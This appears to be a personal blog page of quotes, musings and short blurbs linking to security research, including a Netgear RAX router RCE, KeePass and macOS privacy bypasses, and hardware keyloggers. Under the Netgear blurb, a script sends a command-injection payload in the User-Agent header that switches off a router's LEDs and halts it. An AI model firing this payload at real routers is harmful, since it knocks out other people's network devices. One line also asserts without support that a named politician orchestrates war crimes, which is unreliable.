so.cl

Rascals are always sociable, and the chief sign that a man has any nobility in his character is the little pleasure he takes in others' company. Arthur Schopenhauer


A breakdown of a bug SEFCOM T0 and I exploited to achieve a WAN-side RCE in some Netgear RAX routers for pwn2own 2022. The bug is a remotely accessible command injection due to bad packet logging, cataloged as CVE-2023-24749. A One-Click WAN-side RCE in Netgear RAX Routers

Quite simple, one might add.

<script>
Object.defineProperty(navigator, 'userAgent', {
	get: function () { return 'TEST'; }
});
const xhr = new XMLHttpRequest()
xhr.open("GET", "/")
xhr.setRequestHeader("User-Agent", '"; ledCli ALLSW MSG_LED_ALL_SW_OFF; sleep 1; halt -f;"');
xhr.send()
</script>

This challenge is designed for beginners and professionals who want to learn the Python programming language. It may take 30 to 100 days to complete the challenge; people who actively participate in the Telegram group have a high probability of completing the challenge. 30 days of Python programming challenge

The universe is the rotting corpse of a God who killed himself. Philipp Mainländer

You probably know Friedrich Nietzsche’s famous quote “When you stare into the abyss, the abyss stares back at you.” I’d rather say: stare harder. Feel the coldness enter your bones. When you are one with it, force it to embody the meaning you carry. You’re not stuck here with the void, the void is stuck here with you.

Imagine a number of men in chains, all under sentence of death, some of whom are each day butchered in the sight of others; those remaining see their own condition in that of their fellows, and looking at each other with grief and despair await their turn. This is an image of the human condition. Blaise Pascal, Pensées

With the recent KeePass2 disputed CVE-2023-24055 and all the fuss around it, it motivated me to finish a little project I had started last year. My goal was to see if I could find a way to intercept the Master Password of a KeePass2 database. For fun and learning ofc. Having fun with KeePass2: DLL Hijacking and hooking APIs

These vulnerabilities were first disclosed at TyphoonCon in Seoul during my talk What happens on your Mac, stays on Apple’s iCloud?! Bypassing Mac privacy mechanisms. I found 2 code injection opportunities in iMovie and GarageBand which allowed me to impersonate their com.apple.private.icloud-account.access entitlements. Then, I was able to talk to the iCloud XPC helper, which gave me the user’s iCloud tokens. With these tokens, I was able to get all the data that is synchronized with iCloud and is normally protected via TCC (Contacts, Reminders, Calendars, Location, etc). Bypass TCC via iCloud

I’m pretty sure Hillary Clinton has cute old lady hobbies when she’s not orchestrating war crimes in the Middle East.

Use this Burp plugin to automatically spin up a DigitalOcean droplet whenever Burp starts, and shut it down whenever Burp closes. The droplet functions as a SOCKS5 proxy, and the Burp settings are automatically updated to route traffic through the droplet. DigitalOcean droplet proxy for Burp Suite

Every now and again something will happen that’s so stupid it could only happen in real life, because if it happened in a book people would say it was bad writing. I live for these stupid moments.

Hardware keyloggers can be bought online for a couple of dollars and are very appreciated due to their discretion, because they cannot be discovered by endpoint security software. The only condition for attackers is the usage of an external keyboard. We can assume they are used for espionage, while no public communication exists for such usage apart from a few articles. They can be bought on many websites, even Amazon, making them commonly used in private life, for example during a divorce. Many vendors also highlight their usage for monitoring employees. These vendors also sell other kinds of recording devices, such as video (recording VGA, HDMI or DVI), RS232 and even Ethernet loggers. For all these tools, the price varies according to storage capacity and features (time keeping, Wi-Fi access…). Additionally, backdoored keyboards or small PCBs to insert in existing ones can also easily be bought online. Hardware investigation of wireless keyloggers

You live in a world where movies are deemed good or bad by the composition of the production staff. Statements are factual depending not only on who says it, but why they say it. Products are purchased because of how the raw materials were sourced.

You don’t eat strawberries, you drink Baskin Robbins strawberry ice cream-flavored sugar-free pea-protein meal replacement powder. You order small jumbo popcorn chicken at the drive-thru. You’ve only seen Plato’s cave via VR headset … on a Twitch stream.

Recently, I stumbled upon an OpenBSD effort that attempts to make it harder to perform ROP-based exploitation against sshd: sshd random relinking at boot

It comes down to this line in the Makefile:

cc -o sshd `echo ${OBJS} | tr ' ' '\n' | sort -R` ${LDADD}

The essence of the idea is to simply pass the .o files in a random order to the linker. Their order inside the sshd binary won’t be predictable. On reboot, OpenBSD relinks the binary. This ensures that it’ll differ between OpenBSD installations and thus, offsets for ROP gadgets will vary too. The idea is that this has the potential to make an attacker's life harder, as a standard ROP attack requires inspecting the target binaries. Fun with Gentoo: Why don’t we just shuffle those ROP gadgets away?

To begin, we are going to take a look at the fundamentals of analyzing office documents and office attacks. Office attacks are just one of the many methods that malware authors are utilizing in order to infiltrate computers at this time, and they can do so utilizing one of three different approaches. Static malware analysis: Office documents

The wise man holds knowledge and doesn’t let it disturb his mind. The fool gets mad with information. Learn to separate both things.

I feel strangely drawn to that which is abandoned or forgotten. Books that very few people read nowadays, about topics that very few people care about, passion projects of people on the internet who never made it, niche, old games, dilapidated houses, small town city streets at 3AM. Their loneliness calls out to me. Not in a hipster way, but in the sense that they have a strange pull to them that is hard to explain.

Social media will destroy your ability to read and write longer than a twitter post. Brevity may be the soul of wit, but I feel that without the alternative it’s just a husk.

If I would start writing another kernel (and accompanying OS) it would definitely be a microkernel that would burn all POSIX bridges. Something like L4.